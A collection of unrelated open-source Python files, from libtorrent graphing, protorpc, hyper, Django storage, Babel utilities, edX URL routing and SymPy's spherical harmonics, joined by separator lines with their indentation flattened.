('peer_dl_rates2', 'num', '', 'peers split into download rate buckets (only downloading peers)', ['peers down 0-2', 'peers down 2-5', 'peers down 5-10', 'peers down 50-100', 'peers down 100-'], stacked),
('peer_ul_rates', 'num', '', 'peers split into upload rate buckets', ['peers up 0', 'peers up 0-2', 'peers up 2-5', 'peers up 5-10', 'peers up 50-100', 'peers up 100-'], stacked),
('peer_ul_rates2', 'num', '', 'peers split into upload rate buckets (only uploading peers)', ['peers up 0-2', 'peers up 2-5', 'peers up 5-10', 'peers up 50-100', 'peers up 100-'], stacked),
('piece_picker_end_game', 'blocks', '', '', ['end game piece picker blocks', 'piece picker blocks', \
'piece picks', 'reject piece picks', 'unchoke piece picks', 'incoming redundant piece picks', \
'incoming piece picks', 'end game piece picks', 'snubbed piece picks'], stacked),
('piece_picker', 'blocks', '', '', ['piece picks', 'reject piece picks', 'unchoke piece picks', 'incoming redundant piece picks', 'incoming piece picks', 'end game piece picks', 'snubbed piece picks'], stacked),
]
print 'generating graphs'
log_file_path, log_file = os.path.split(sys.argv[1])
log_file_list = log_file.split('.')
g = int(log_file_list[1])
generations = []
scripts = []
while os.path.exists(os.path.join(log_file_path, log_file)):
print '[%s] %04d\r[' % (' ' * len(reports), g),
for i in reports:
type = line_graph
try: type = i[5]
except: pass
script = gen_report(i[0], i[1], i[4], i[2], g, os.path.join(log_file_path, log_file), type)
if script != None: scripts.append(script)
generations.append(g)
g += 1
log_file_list[1] = '%04d' % g
log_file = '.'.join(log_file_list)
# run gnuplot on all scripts, in parallel
thread_pool.map(plot_fun, scripts)
print '\ngenerating html'
gen_html(reports, generations)
|
nplurals=3 # Czech language has 3 forms:
# 1 singular and 2 plurals
get_plural_id = lambda n: ( 0 if n==1 else
1 if 2<=n<=4 else
2 )
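# Illustrative mapping of the rule above:
#   get_plural_id(1) -> 0  (singular)
#   get_plural_id(3) -> 1  (2-4)
#   get_plural_id(7) -> 2  (everything else)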
|
from __future__ import with_statement
__author__ = 'rafek@google.com (Rafe Kaplan)'
import logging
from . import descriptor
from . import generate
from . import messages
from . import util
__all__ = ['format_proto_file']
@util.positional(2)
def format_proto_file(file_descriptor, output, indent_space=2):
out = generate.IndentWriter(output, indent_space=indent_space)
if file_descriptor.package:
out << 'package %s;' % file_descriptor.package
def write_enums(enum_descriptors):
"""Write nested and non-nested Enum types.
Args:
enum_descriptors: List of EnumDescriptor objects from which to generate
enums.
"""
# Write enums.
for enum in enum_descriptors or []:
out << ''
out << ''
out << 'enum %s {' % enum.name
out << ''
with out.indent():
if enum.values:
for enum_value in enum.values:
out << '%s = %s;' % (enum_value.name, enum_value.number)
out << '}'
write_enums(file_descriptor.enum_types)
def write_fields(field_descriptors):
"""Write fields for Message types.
Args:
field_descriptors: List of FieldDescriptor objects from which to generate
fields.
"""
for field in field_descriptors or []:
default_format = ''
if field.default_value is not None:
if field.label == descriptor.FieldDescriptor.Label.REPEATED:
logging.warning('Default value for repeated field %s is not being '
'written to proto file' % field.name)
else:
# Convert default value to string.
if field.variant == messages.Variant.MESSAGE:
logging.warning(
'Message field %s should not have default values' % field.name)
default = None
elif field.variant == messages.Variant.STRING:
default = repr(field.default_value.encode('utf-8'))
elif field.variant == messages.Variant.BYTES:
default = repr(field.default_value)
else:
default = str(field.default_value)
if default is not None:
default_format = ' [default=%s]' % default
if field.variant in (messages.Variant.MESSAGE, messages.Variant.ENUM):
field_type = field.type_name
else:
field_type = str(field.variant).lower()
out << '%s %s %s = %s%s;' % (str(field.label).lower(),
field_type,
field.name,
field.number,
default_format)
def write_messages(message_descriptors):
"""Write nested and non-nested Message types.
Args:
message_descriptors: List of MessageDescriptor objects from which to
generate messages.
"""
for message in message_descriptors or []:
out << ''
out << ''
out << 'message %s {' % message.name
with out.indent():
if message.enum_types:
write_enums(message.enum_types)
if message.message_types:
write_messages(message.message_types)
if message.fields:
write_fields(message.fields)
out << '}'
write_messages(file_descriptor.message_types)
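# Usage sketch (assumption, illustrative only): describe_file() from this
# package builds the FileDescriptor for a module of Message definitions,
# which format_proto_file() can then render; 'my_messages_module' is a
# hypothetical stand-in.
#
#   import sys
#   file_desc = descriptor.describe_file(my_messages_module)
#   format_proto_file(file_desc, sys.stdout)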
|
"""
hyper/common/decoder
~~~~~~~~~~~~~~~~~~~~
Contains hyper's code for handling compressed bodies.
"""
import zlib
class DeflateDecoder(object):
"""
This is a decoding object that wraps ``zlib`` and is used for decoding
deflated content.
    The rationale for the existence of this object is pretty unpleasant.
The HTTP RFC specifies that 'deflate' is a valid content encoding. However,
the spec _meant_ the zlib encoding form. Unfortunately, people who didn't
read the RFC very carefully actually implemented a different form of
'deflate'. Insanely, ``zlib`` handles them using two wbits values. This is
such a mess it's hard to adequately articulate.
This class was lovingly borrowed from the excellent urllib3 library under
license: see NOTICES. If you ever see @shazow, you should probably buy him
a drink or something.
"""
def __init__(self):
self._first_try = True
self._data = b''
self._obj = zlib.decompressobj(zlib.MAX_WBITS)
def __getattr__(self, name):
return getattr(self._obj, name)
def decompress(self, data):
if not self._first_try:
return self._obj.decompress(data)
self._data += data
try:
return self._obj.decompress(data)
except zlib.error:
self._first_try = False
self._obj = zlib.decompressobj(-zlib.MAX_WBITS)
try:
return self.decompress(self._data)
finally:
self._data = None
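# Usage sketch (assumption, not part of hyper's public API): the decoder
# transparently handles both the zlib-wrapped and the raw form of deflate.
if __name__ == '__main__':
    payload = b'hello deflate'
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS):
        compressor = zlib.compressobj(9, zlib.DEFLATED, wbits)
        body = compressor.compress(payload) + compressor.flush()
        # A fresh decoder per stream; the raw form exercises the retry path.
        assert DeflateDecoder().decompress(body) == payload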
|
import errno
import os
import warnings
from datetime import datetime
from django.conf import settings
from django.core.exceptions import SuspiciousFileOperation
from django.core.files import File, locks
from django.core.files.move import file_move_safe
from django.core.signals import setting_changed
from django.utils import timezone
from django.utils._os import abspathu, safe_join
from django.utils.crypto import get_random_string
from django.utils.deconstruct import deconstructible
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import filepath_to_uri, force_text
from django.utils.functional import LazyObject, cached_property
from django.utils.module_loading import import_string
from django.utils.six.moves.urllib.parse import urljoin
from django.utils.text import get_valid_filename
__all__ = ('Storage', 'FileSystemStorage', 'DefaultStorage', 'default_storage')
class Storage(object):
"""
A base storage class, providing some default behaviors that all other
storage systems can inherit or override, as necessary.
"""
# The following methods represent a public interface to private methods.
# These shouldn't be overridden by subclasses unless absolutely necessary.
def open(self, name, mode='rb'):
"""
Retrieves the specified file from storage.
"""
return self._open(name, mode)
def save(self, name, content, max_length=None):
"""
Saves new content to the file specified by name. The content should be
a proper File object or any python file-like object, ready to be read
from the beginning.
"""
# Get the proper name for the file, as it will actually be saved.
if name is None:
name = content.name
if not hasattr(content, 'chunks'):
content = File(content, name)
name = self.get_available_name(name, max_length=max_length)
return self._save(name, content)
# These methods are part of the public API, with default implementations.
def get_valid_name(self, name):
"""
Returns a filename, based on the provided filename, that's suitable for
use in the target storage system.
"""
return get_valid_filename(name)
def get_available_name(self, name, max_length=None):
"""
Returns a filename that's free on the target storage system, and
available for new content to be written to.
"""
dir_name, file_name = os.path.split(name)
file_root, file_ext = os.path.splitext(file_name)
# If the filename already exists, add an underscore and a random 7
# character alphanumeric string (before the file extension, if one
# exists) to the filename until the generated filename doesn't exist.
# Truncate original name if required, so the new filename does not
# exceed the max_length.
while self.exists(name) or (max_length and len(name) > max_length):
# file_ext includes the dot.
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
if max_length is None:
continue
# Truncate file_root if max_length exceeded.
truncation = len(name) - max_length
if truncation > 0:
file_root = file_root[:-truncation]
# Entire file_root was truncated in attempt to find an available filename.
if not file_root:
raise SuspiciousFileOperation(
'Storage can not find an available filename for "%s". '
'Please make sure that the corresponding file field '
'allows sufficient "max_length".' % name
)
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
return name
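    # Behavior sketch (illustrative, names assumed): with 'photo.jpg' already
    # taken, a call like
    #   storage.get_available_name('photo.jpg')
    # yields e.g. 'photo_kg9f2a1.jpg' (a 7-character random suffix before the
    # extension); if max_length would be exceeded, file_root is truncated
    # before retrying.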
def generate_filename(self, filename):
"""
Validate the filename by calling get_valid_name() and return a filename
to be passed to the save() method.
"""
# `filename` may include a path as returned by FileField.upload_to.
dirname, filename = os.path.split(filename)
return os.path.normpath(os.path.join(dirname, self.get_valid_name(filename)))
def path(self, name):
"""
Returns a local filesystem path where the file can be retrieved using
Python's built-in open() function. Storage systems that can't be
accessed using open() should *not* implement this method.
"""
raise NotImplementedError("This backend doesn't support absolute paths.")
# The following methods form the public API for storage systems, but with
# no default implementations. Subclasses must implement *all* of these.
def delete(self, name):
"""
Deletes the specified file from the storage system.
"""
raise NotImplementedError('subclasses of Storage must provide a delete() method')
def exists(self, name):
"""
Returns True if a file referenced by the given name already exists in the
storage system, or False if the name is available for a new file.
"""
raise NotImplementedError('subclasses of Storage must provide an exists() method')
def listdir(self, path):
"""
Lists the contents of the specified path, returning a 2-tuple of lists;
the first item being directories, the second item being files.
"""
raise NotImplementedError('subclasses of Storage must provide a listdir() method')
def size(self, name):
"""
Returns the total size, in bytes, of the file specified by name.
"""
raise NotImplementedError('subclasses of Storage must provide a size() method')
def url(self, name):
"""
Returns an absolute URL where the file's contents can be accessed
directly by a Web browser.
"""
raise NotImplementedError('subclasses of Storage must provide a url() method')
def accessed_time(self, name):
"""
Returns the last accessed time (as datetime object) of the file
specified by name. Deprecated: use get_accessed_time() instead.
"""
warnings.warn(
'Storage.accessed_time() is deprecated in favor of get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide an accessed_time() method')
def created_time(self, name):
"""
Returns the creation time (as datetime object) of the file
specified by name. Deprecated: use get_created_time() instead.
"""
warnings.warn(
'Storage.created_time() is deprecated in favor of get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a created_time() method')
def modified_time(self, name):
"""
Returns the last modified time (as datetime object) of the file
specified by name. Deprecated: use get_modified_time() instead.
"""
warnings.warn(
'Storage.modified_time() is deprecated in favor of get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a modified_time() method')
def get_accessed_time(self, name):
"""
Return the last accessed time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_accessed_time() method')
warnings.warn(
'Storage.accessed_time() is deprecated. '
'Storage backends should implement get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.accessed_time(name)
return _possibly_make_aware(dt)
def get_created_time(self, name):
"""
Return the creation time (as a datetime) of the file specified by name.
The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_created_time() method')
warnings.warn(
'Storage.created_time() is deprecated. '
'Storage backends should implement get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.created_time(name)
return _possibly_make_aware(dt)
def get_modified_time(self, name):
"""
Return the last modified time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_modified_time() method')
warnings.warn(
'Storage.modified_time() is deprecated. '
'Storage backends should implement get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.modified_time(name)
return _possibly_make_aware(dt)
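# Minimal in-memory subclass sketch (assumption, illustrative only; not part
# of Django). A concrete backend implements _open/_save plus the public
# methods above that raise NotImplementedError:
#
#   import io
#   class DictStorage(Storage):
#       def __init__(self):
#           self._files = {}
#       def _open(self, name, mode='rb'):
#           return File(io.BytesIO(self._files[name]), name)
#       def _save(self, name, content):
#           self._files[name] = content.read()
#           return name
#       def exists(self, name):
#           return name in self._files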
def _possibly_make_aware(dt):
"""
Convert a datetime object in the local timezone to aware
in UTC, if USE_TZ is True.
"""
# This function is only needed to help with the deprecations above and can
# be removed in Django 2.0, RemovedInDjango20Warning.
if settings.USE_TZ:
tz = timezone.get_default_timezone()
return timezone.make_aware(dt, tz).astimezone(timezone.utc)
else:
return dt
@deconstructible
class FileSystemStorage(Storage):
"""
Standard filesystem storage
"""
def __init__(self, location=None, base_url=None, file_permissions_mode=None,
directory_permissions_mode=None):
self._location = location
self._base_url = base_url
self._file_permissions_mode = file_permissions_mode
self._directory_permissions_mode = directory_permissions_mode
setting_changed.connect(self._clear_cached_properties)
def _clear_cached_properties(self, setting, **kwargs):
"""Reset setting based property values."""
if setting == 'MEDIA_ROOT':
self.__dict__.pop('base_location', None)
self.__dict__.pop('location', None)
elif setting == 'MEDIA_URL':
self.__dict__.pop('base_url', None)
elif setting == 'FILE_UPLOAD_PERMISSIONS':
self.__dict__.pop('file_permissions_mode', None)
elif setting == 'FILE_UPLOAD_DIRECTORY_PERMISSIONS':
self.__dict__.pop('directory_permissions_mode', None)
def _value_or_setting(self, value, setting):
return setting if value is None else value
@cached_property
def base_location(self):
return self._value_or_setting(self._location, settings.MEDIA_ROOT)
@cached_property
def location(self):
return abspathu(self.base_location)
@cached_property
def base_url(self):
if self._base_url is not None and not self._base_url.endswith('/'):
self._base_url += '/'
return self._value_or_setting(self._base_url, settings.MEDIA_URL)
@cached_property
def file_permissions_mode(self):
return self._value_or_setting(self._file_permissions_mode, settings.FILE_UPLOAD_PERMISSIONS)
@cached_property
def directory_permissions_mode(self):
return self._value_or_setting(self._directory_permissions_mode, settings.FILE_UPLOAD_DIRECTORY_PERMISSIONS)
def _open(self, name, mode='rb'):
return File(open(self.path(name), mode))
def _save(self, name, content):
full_path = self.path(name)
# Create any intermediate directories that do not exist.
# Note that there is a race between os.path.exists and os.makedirs:
# if os.makedirs fails with EEXIST, the directory was created
# concurrently, and we can continue normally. Refs #16082.
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
try:
if self.directory_permissions_mode is not None:
# os.makedirs applies the global umask, so we reset it,
# for consistency with file_permissions_mode behavior.
old_umask = os.umask(0)
try:
os.makedirs(directory, self.directory_permissions_mode)
finally:
os.umask(old_umask)
else:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(directory):
raise IOError("%s exists and is not a directory." % directory)
# There's a potential race condition between get_available_name and
# saving the file; it's possible that two threads might return the
# same name, at which point all sorts of fun happens. So we need to
# try to create the file, but if it already exists we have to go back
# to get_available_name() and try again.
while True:
try:
# This file has a file path that we can move.
if hasattr(content, 'temporary_file_path'):
file_move_safe(content.temporary_file_path(), full_path)
# This is a normal uploadedfile that we can stream.
else:
# This fun binary flag incantation makes os.open throw an
# OSError if the file already exists before we open it.
flags = (os.O_WRONLY | os.O_CREAT | os.O_EXCL |
getattr(os, 'O_BINARY', 0))
# The current umask value is masked out by os.open!
fd = os.open(full_path, flags, 0o666)
_file = None
try:
locks.lock(fd, locks.LOCK_EX)
for chunk in content.chunks():
if _file is None:
mode = 'wb' if isinstance(chunk, bytes) else 'wt'
_file = os.fdopen(fd, mode)
_file.write(chunk)
finally:
locks.unlock(fd)
if _file is not None:
_file.close()
else:
os.close(fd)
except OSError as e:
if e.errno == errno.EEXIST:
# Ooops, the file exists. We need a new file name.
name = self.get_available_name(name)
full_path = self.path(name)
else:
raise
else:
# OK, the file save worked. Break out of the loop.
break
if self.file_permissions_mode is not None:
os.chmod(full_path, self.file_permissions_mode)
# Store filenames with forward slashes, even on Windows.
return force_text(name.replace('\\', '/'))
def delete(self, name):
assert name, "The name argument is not allowed to be empty."
name = self.path(name)
# If the file exists, delete it from the filesystem.
# If os.remove() fails with ENOENT, the file may have been removed
# concurrently, and it's safe to continue normally.
try:
os.remove(name)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def exists(self, name):
return os.path.exists(self.path(name))
def listdir(self, path):
path = self.path(path)
directories, files = [], []
for entry in os.listdir(path):
if os.path.isdir(os.path.join(path, entry)):
directories.append(entry)
else:
files.append(entry)
return directories, files
def path(self, name):
return safe_join(self.location, name)
def size(self, name):
return os.path.getsize(self.path(name))
def url(self, name):
if self.base_url is None:
raise ValueError("This file is not accessible via a URL.")
url = filepath_to_uri(name)
if url is not None:
url = url.lstrip('/')
return urljoin(self.base_url, url)
def accessed_time(self, name):
warnings.warn(
'FileSystemStorage.accessed_time() is deprecated in favor of '
'get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getatime(self.path(name)))
def created_time(self, name):
warnings.warn(
'FileSystemStorage.created_time() is deprecated in favor of '
'get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getctime(self.path(name)))
def modified_time(self, name):
warnings.warn(
'FileSystemStorage.modified_time() is deprecated in favor of '
'get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getmtime(self.path(name)))
def _datetime_from_timestamp(self, ts):
"""
If timezone support is enabled, make an aware datetime object in UTC;
otherwise make a naive one in the local timezone.
"""
if settings.USE_TZ:
# Safe to use .replace() because UTC doesn't have DST
return datetime.utcfromtimestamp(ts).replace(tzinfo=timezone.utc)
else:
return datetime.fromtimestamp(ts)
def get_accessed_time(self, name):
return self._datetime_from_timestamp(os.path.getatime(self.path(name)))
def get_created_time(self, name):
return self._datetime_from_timestamp(os.path.getctime(self.path(name)))
def get_modified_time(self, name):
return self._datetime_from_timestamp(os.path.getmtime(self.path(name)))
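# Usage sketch (hypothetical location and base_url; Storage.save() and
# django.core.files.base.ContentFile are standard Django APIs):
#
#     storage = FileSystemStorage(location='/var/media', base_url='/media/')
#     name = storage.save('hello.txt', ContentFile(b'hi'))
#     storage.url(name)                  # '/media/hello.txt'
#     storage.get_modified_time(name)    # aware datetime when USE_TZ=True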
def get_storage_class(import_path=None):
return import_string(import_path or settings.DEFAULT_FILE_STORAGE)
class DefaultStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class()()
default_storage = DefaultStorage()
|
"""Various utility classes and functions."""
import codecs
from datetime import timedelta, tzinfo
import os
import re
try:
set = set
except NameError:
from sets import Set as set
import textwrap
import time
from itertools import izip, imap
missing = object()
__all__ = ['distinct', 'pathmatch', 'relpath', 'wraptext', 'odict', 'UTC',
'LOCALTZ']
__docformat__ = 'restructuredtext en'
def distinct(iterable):
"""Yield all items in an iterable collection that are distinct.
Unlike when using sets for a similar effect, the original ordering of the
items in the collection is preserved by this function.
>>> print list(distinct([1, 2, 1, 3, 4, 4]))
[1, 2, 3, 4]
>>> print list(distinct('foobar'))
['f', 'o', 'b', 'a', 'r']
:param iterable: the iterable collection providing the data
:return: the distinct items in the collection
:rtype: ``iterator``
"""
seen = set()
for item in iter(iterable):
if item not in seen:
yield item
seen.add(item)
PYTHON_MAGIC_COMMENT_re = re.compile(
r'[ \t\f]* \# .* coding[=:][ \t]*([-\w.]+)', re.VERBOSE)
def parse_encoding(fp):
"""Deduce the encoding of a source file from magic comment.
It does this in the same way as the `Python interpreter`__
.. __: http://docs.python.org/ref/encodings.html
The ``fp`` argument should be a seekable file object.
(From Jeff Dairiki)
"""
pos = fp.tell()
fp.seek(0)
try:
line1 = fp.readline()
has_bom = line1.startswith(codecs.BOM_UTF8)
if has_bom:
line1 = line1[len(codecs.BOM_UTF8):]
m = PYTHON_MAGIC_COMMENT_re.match(line1)
if not m:
try:
import parser
parser.suite(line1)
except (ImportError, SyntaxError):
# Either it's a real syntax error, in which case the source is
# not valid python source, or line2 is a continuation of line1,
# in which case we don't want to scan line2 for a magic
# comment.
pass
else:
line2 = fp.readline()
m = PYTHON_MAGIC_COMMENT_re.match(line2)
if has_bom:
if m:
raise SyntaxError(
"python refuses to compile code with both a UTF8 "
"byte-order-mark and a magic encoding comment")
return 'utf_8'
elif m:
return m.group(1)
else:
return None
finally:
fp.seek(pos)
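# A minimal usage sketch (StringIO stands in for a real source file):
#
#     >>> from StringIO import StringIO
#     >>> parse_encoding(StringIO('# -*- coding: utf-8 -*-\n'))
#     'utf-8'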
def pathmatch(pattern, filename):
"""Extended pathname pattern matching.
This function is similar to what is provided by the ``fnmatch`` module in
the Python standard library, but:
* can match complete (relative or absolute) path names, and not just file
names, and
* also supports a convenience pattern ("**") to match files at any
directory level.
Examples:
>>> pathmatch('**.py', 'bar.py')
True
>>> pathmatch('**.py', 'foo/bar/baz.py')
True
>>> pathmatch('**.py', 'templates/index.html')
False
>>> pathmatch('**/templates/*.html', 'templates/index.html')
True
>>> pathmatch('**/templates/*.html', 'templates/foo/bar.html')
False
:param pattern: the glob pattern
:param filename: the path name of the file to match against
:return: `True` if the path name matches the pattern, `False` otherwise
:rtype: `bool`
"""
symbols = {
'?': '[^/]',
'?/': '[^/]/',
'*': '[^/]+',
'*/': '[^/]+/',
'**/': '(?:.+/)*?',
'**': '(?:.+/)*?[^/]+',
}
buf = []
for idx, part in enumerate(re.split('([?*]+/?)', pattern)):
if idx % 2:
buf.append(symbols[part])
elif part:
buf.append(re.escape(part))
match = re.match(''.join(buf) + '$', filename.replace(os.sep, '/'))
return match is not None
class TextWrapper(textwrap.TextWrapper):
wordsep_re = re.compile(
r'(\s+|' # any whitespace
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))' # em-dash
)
def wraptext(text, width=70, initial_indent='', subsequent_indent=''):
"""Simple wrapper around the ``textwrap.wrap`` function in the standard
library. This version does not wrap lines on hyphens in words.
:param text: the text to wrap
:param width: the maximum line width
:param initial_indent: string that will be prepended to the first line of
wrapped output
:param subsequent_indent: string that will be prepended to all lines save
the first of wrapped output
:return: a list of lines
:rtype: `list`
"""
wrapper = TextWrapper(width=width, initial_indent=initial_indent,
subsequent_indent=subsequent_indent,
break_long_words=False)
return wrapper.wrap(text)
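# Usage sketch:
#
#     >>> wraptext('the quick brown fox jumps over the lazy dog', width=15)
#     ['the quick brown', 'fox jumps over', 'the lazy dog']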
class odict(dict):
"""Ordered dict implementation.
:see: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/107747
"""
def __init__(self, data=None):
dict.__init__(self, data or {})
self._keys = dict.keys(self)
def __delitem__(self, key):
dict.__delitem__(self, key)
self._keys.remove(key)
def __setitem__(self, key, item):
dict.__setitem__(self, key, item)
if key not in self._keys:
self._keys.append(key)
def __iter__(self):
return iter(self._keys)
iterkeys = __iter__
def clear(self):
dict.clear(self)
self._keys = []
def copy(self):
d = odict()
d.update(self)
return d
def items(self):
return zip(self._keys, self.values())
def iteritems(self):
return izip(self._keys, self.itervalues())
def keys(self):
return self._keys[:]
    def pop(self, key, default=missing):
        if default is missing:
            value = dict.pop(self, key)
            self._keys.remove(key)
            return value
        elif key not in self:
            return default
        self._keys.remove(key)
        return dict.pop(self, key, default)
    def popitem(self, key):
        value = dict.pop(self, key)
        self._keys.remove(key)
        return (key, value)
    def setdefault(self, key, failobj=None):
dict.setdefault(self, key, failobj)
if key not in self._keys:
self._keys.append(key)
def update(self, dict):
for (key, val) in dict.items():
self[key] = val
def values(self):
return map(self.get, self._keys)
def itervalues(self):
return imap(self.get, self._keys)
try:
relpath = os.path.relpath
except AttributeError:
def relpath(path, start='.'):
"""Compute the relative path to one path from another.
>>> relpath('foo/bar.txt', '').replace(os.sep, '/')
'foo/bar.txt'
>>> relpath('foo/bar.txt', 'foo').replace(os.sep, '/')
'bar.txt'
>>> relpath('foo/bar.txt', 'baz').replace(os.sep, '/')
'../foo/bar.txt'
:return: the relative path
:rtype: `basestring`
"""
start_list = os.path.abspath(start).split(os.sep)
path_list = os.path.abspath(path).split(os.sep)
# Work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.path.pardir] * (len(start_list) - i) + path_list[i:]
return os.path.join(*rel_list)
try:
from operator import attrgetter, itemgetter
except ImportError:
def itemgetter(name):
def _getitem(obj):
return obj[name]
return _getitem
try:
''.rsplit
    def rsplit(a_string, sep=None, maxsplit=None):
        if maxsplit is None:
            return a_string.rsplit(sep)
        return a_string.rsplit(sep, maxsplit)
except AttributeError:
def rsplit(a_string, sep=None, maxsplit=None):
parts = a_string.split(sep)
if maxsplit is None or len(parts) <= maxsplit:
return parts
maxsplit_index = len(parts) - maxsplit
non_splitted_part = sep.join(parts[:maxsplit_index])
splitted = parts[maxsplit_index:]
return [non_splitted_part] + splitted
ZERO = timedelta(0)
class FixedOffsetTimezone(tzinfo):
"""Fixed offset in minutes east from UTC."""
def __init__(self, offset, name=None):
self._offset = timedelta(minutes=offset)
if name is None:
name = 'Etc/GMT+%d' % offset
self.zone = name
def __str__(self):
return self.zone
def __repr__(self):
return '<FixedOffset "%s" %s>' % (self.zone, self._offset)
def utcoffset(self, dt):
return self._offset
def tzname(self, dt):
return self.zone
def dst(self, dt):
return ZERO
try:
from pytz import UTC
except ImportError:
UTC = FixedOffsetTimezone(0, 'UTC')
"""`tzinfo` object for UTC (Universal Time).
:type: `tzinfo`
"""
STDOFFSET = timedelta(seconds=-time.timezone)
if time.daylight:
    DSTOFFSET = timedelta(seconds=-time.altzone)
else:
    DSTOFFSET = STDOFFSET
DSTDIFF = DSTOFFSET - STDOFFSET
class LocalTimezone(tzinfo):
def utcoffset(self, dt):
if self._isdst(dt):
return DSTOFFSET
else:
return STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return DSTDIFF
else:
return ZERO
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, -1)
stamp = time.mktime(tt)
tt = time.localtime(stamp)
return tt.tm_isdst > 0
LOCALTZ = LocalTimezone()
"""`tzinfo` object for local time-zone.
:type: `tzinfo`
"""
|
""" API v1 URLs. """
from django.conf import settings
from django.conf.urls import patterns, url, include
from commerce.api.v1 import views
COURSE_URLS = patterns(
'',
url(r'^$', views.CourseListView.as_view(), name='list'),
url(r'^{}/$'.format(settings.COURSE_ID_PATTERN), views.CourseRetrieveUpdateView.as_view(), name='retrieve_update'),
)
ORDER_URLS = patterns(
'',
url(r'^(?P<number>[-\w]+)/$', views.OrderView.as_view(), name='detail'),
)
urlpatterns = patterns(
'',
url(r'^courses/', include(COURSE_URLS, namespace='courses')),
url(r'^orders/', include(ORDER_URLS, namespace='orders')),
)
|
from __future__ import print_function, division
from sympy import pi, I
from sympy.core.singleton import S
from sympy.core import Dummy, sympify
from sympy.core.function import Function, ArgumentIndexError
from sympy.functions import assoc_legendre
from sympy.functions.elementary.trigonometric import sin, cos, cot
from sympy.functions.combinatorial.factorials import factorial
from sympy.functions.elementary.complexes import Abs
from sympy.functions.elementary.exponential import exp
from sympy.functions.elementary.miscellaneous import sqrt
_x = Dummy("x")
class Ynm(Function):
r"""
Spherical harmonics defined as
.. math::
Y_n^m(\theta, \varphi) := \sqrt{\frac{(2n+1)(n-m)!}{4\pi(n+m)!}}
\exp(i m \varphi)
\mathrm{P}_n^m\left(\cos(\theta)\right)
Ynm() gives the spherical harmonic function of order `n` and `m`
in `\theta` and `\varphi`, `Y_n^m(\theta, \varphi)`. The four
parameters are as follows: `n \geq 0` an integer and `m` an integer
such that `-n \leq m \leq n` holds. The two angles are real-valued
with `\theta \in [0, \pi]` and `\varphi \in [0, 2\pi]`.
Examples
========
>>> from sympy import Ynm, Symbol
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> Ynm(n, m, theta, phi)
Ynm(n, m, theta, phi)
Several symmetries are known, for the order
>>> from sympy import Ynm, Symbol
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> Ynm(n, -m, theta, phi)
(-1)**m*exp(-2*I*m*phi)*Ynm(n, m, theta, phi)
as well as for the angles
>>> from sympy import Ynm, Symbol, simplify
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> Ynm(n, m, -theta, phi)
Ynm(n, m, theta, phi)
>>> Ynm(n, m, theta, -phi)
exp(-2*I*m*phi)*Ynm(n, m, theta, phi)
    For specific integers n and m we can evaluate the harmonics
to more useful expressions
>>> simplify(Ynm(0, 0, theta, phi).expand(func=True))
1/(2*sqrt(pi))
>>> simplify(Ynm(1, -1, theta, phi).expand(func=True))
sqrt(6)*exp(-I*phi)*sin(theta)/(4*sqrt(pi))
>>> simplify(Ynm(1, 0, theta, phi).expand(func=True))
sqrt(3)*cos(theta)/(2*sqrt(pi))
>>> simplify(Ynm(1, 1, theta, phi).expand(func=True))
-sqrt(6)*exp(I*phi)*sin(theta)/(4*sqrt(pi))
>>> simplify(Ynm(2, -2, theta, phi).expand(func=True))
sqrt(30)*exp(-2*I*phi)*sin(theta)**2/(8*sqrt(pi))
>>> simplify(Ynm(2, -1, theta, phi).expand(func=True))
sqrt(30)*exp(-I*phi)*sin(2*theta)/(8*sqrt(pi))
>>> simplify(Ynm(2, 0, theta, phi).expand(func=True))
sqrt(5)*(3*cos(theta)**2 - 1)/(4*sqrt(pi))
>>> simplify(Ynm(2, 1, theta, phi).expand(func=True))
-sqrt(30)*exp(I*phi)*sin(2*theta)/(8*sqrt(pi))
>>> simplify(Ynm(2, 2, theta, phi).expand(func=True))
sqrt(30)*exp(2*I*phi)*sin(theta)**2/(8*sqrt(pi))
We can differentiate the functions with respect
to both angles
>>> from sympy import Ynm, Symbol, diff
>>> from sympy.abc import n,m
>>> theta = Symbol("theta")
>>> phi = Symbol("phi")
>>> diff(Ynm(n, m, theta, phi), theta)
